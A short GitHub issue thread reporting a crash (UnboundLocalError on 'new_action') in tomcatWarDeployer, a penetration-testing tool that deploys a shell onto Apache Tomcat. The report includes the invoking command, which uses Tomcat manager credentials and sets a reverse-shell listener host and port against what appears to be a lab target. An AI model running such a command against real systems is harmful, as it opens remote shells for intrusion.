### ISSUE TITLE
Crash - variable used before assignment

### ISSUE THREAD

**Issue by moshekaplan** [mgeeky/tomcatWarDeployer#12]
**Command**: `# python tomcatWarDeployer-master/tomcatWarDeployer.py -x http://10.10.10.95:8080  -U tomcat -P s3cret -H LHOST=10.10.15.242 -p 12345`

**Output**: 
```
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: 	At: "http://10.10.10.95:8080/manager"
WARNING: Application with name: "jsp_app" is already deployed.
Traceback (most recent call last):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1165, in <module>
    main()
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 1078, in main
    if unloadApplication(browser, args[0], opts.appname):
  File "tomcatWarDeployer-master/tomcatWarDeployer.py", line 709, in unloadApplication
    browser.form.action = new_action
UnboundLocalError: local variable 'new_action' referenced before assignment
```

**Comment by jgwinnett** [comment]
Confirming that the same also occurs for me running the command - seems to be an issue with the unload process. A workaround is to give the application a different name and deploy without unloading.

**Comment by mgeeky** [comment]
I pushed a fix for that issue. Will be grateful if you find some time to give it a try!
